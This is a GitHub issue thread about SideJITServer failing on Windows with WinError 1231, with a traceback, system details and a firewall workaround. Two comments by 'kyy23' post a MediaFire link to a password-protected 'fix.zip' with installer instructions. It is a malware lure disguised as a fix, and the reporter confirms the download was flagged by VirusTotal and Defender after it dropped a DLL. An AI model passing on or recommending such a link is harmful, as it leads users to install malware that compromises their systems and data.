### ISSUE TITLE
Can't start SideJITServer - WinError 1231

### ISSUE THREAD

**Issue by EriikP4** [nythepegasus/SideJITServer#126]
**PowerShell Admin Output**

```
PS C:\Windows\system32> SideJITServer.exe
INFO:     Started server process [7376]
INFO:     Waiting for application startup.
INFO:     Application startup complete.
INFO:     Uvicorn running on http://127.0.0.1:49151 (Press CTRL+C to quit)
INFO:     127.0.0.1:58393 - "GET / HTTP/1.1" 200 OK
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Scripts\SideJITServer.exe\__main__.py", line 7, in <module>
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\click\core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\click\core.py", line 1078, in main
    rv = self.invoke(ctx)
         ^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\click\core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\click\core.py", line 783, in invoke
    return __callback(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\SideJITServer\__init__.py", line 259, in start_server
    refresh_devs()
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\SideJITServer\__init__.py", line 123, in refresh_devs
    for dev in get_tunneld_devices():
               ^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\pymobiledevice3\tunneld.py", line 470, in get_tunneld_devices
    return get_asyncio_loop().run_until_complete(async_get_tunneld_devices(tunneld_address))
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_events.py", line 687, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\pymobiledevice3\tunneld.py", line 465, in async_get_tunneld_devices
    return await _create_rsds_from_tunnels(tunnels)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\pymobiledevice3\tunneld.py", line 504, in _create_rsds_from_tunnels
    await rsd.connect()
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\pymobiledevice3\remote\remote_service_discovery.py", line 59, in connect
    await self.service.connect()
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\site-packages\pymobiledevice3\remote\remotexpc.py", line 54, in connect
    self._reader, self._writer = await asyncio.open_connection(self.address[0], self.address[1])
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\asyncio\streams.py", line 48, in open_connection
    transport, _ = await loop.create_connection(
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_events.py", line 1121, in create_connection
    raise exceptions[0]
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_events.py", line 1103, in create_connection
    sock = await self._connect_sock(
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_events.py", line 1006, in _connect_sock
    await self.sock_connect(sock, address)
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\asyncio\proactor_events.py", line 729, in sock_connect
    return await self._proactor.connect(sock, address)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\asyncio\windows_events.py", line 803, in _poll
    value = callback(transferred, key, ov)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Erik\AppData\Local\Programs\Python\Python312\Lib\asyncio\windows_events.py", line 599, in finish_connect
    ov.getresult()
OSError: [WinError 1231] No es posible el acceso a la ubicación de red. Para obtener información para solucionar problemas de red, vea la Ayuda de Windows
```
**Latest Output Message translated**
`Access to the network location is not possible. For network troubleshooting information, see Windows Help.`

**More Info**
- Python goes through firewall
- Access Public enabled
- SMB 1.0 enabled
- PC name is upper-cased [`ERIK-DS3H`]

**System Info**
- OS: **Windows 11 23H2** `22631.4037`
- SideJITServer version **1.3.5**
- pymobiledevice3 version **4.13.1**

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EriikP4** [comment]
https://www.virustotal.com/gui/file/546c34c2782216278a8273d3c9d3a954a980c7c2c7be220914aefe446fe94fd8

20 flags. Malware detected by MS Defender.
file: C:\Users\Erik\AppData\Roaming\d3d9x.dll

**Comment by streetlegithub** [comment]
did you fix it

**Comment by CeriumCerealBowl** [comment]
Not sure what I got it to work but I did these two and it worked
- I did was Allow every python I saw in the Firewall settings; I allowed all the pythons Private and Public. 
- Reset the Firewall to Default, Re-Run the SideJITServer.exe and allowed Private and Public on the Firewall popup
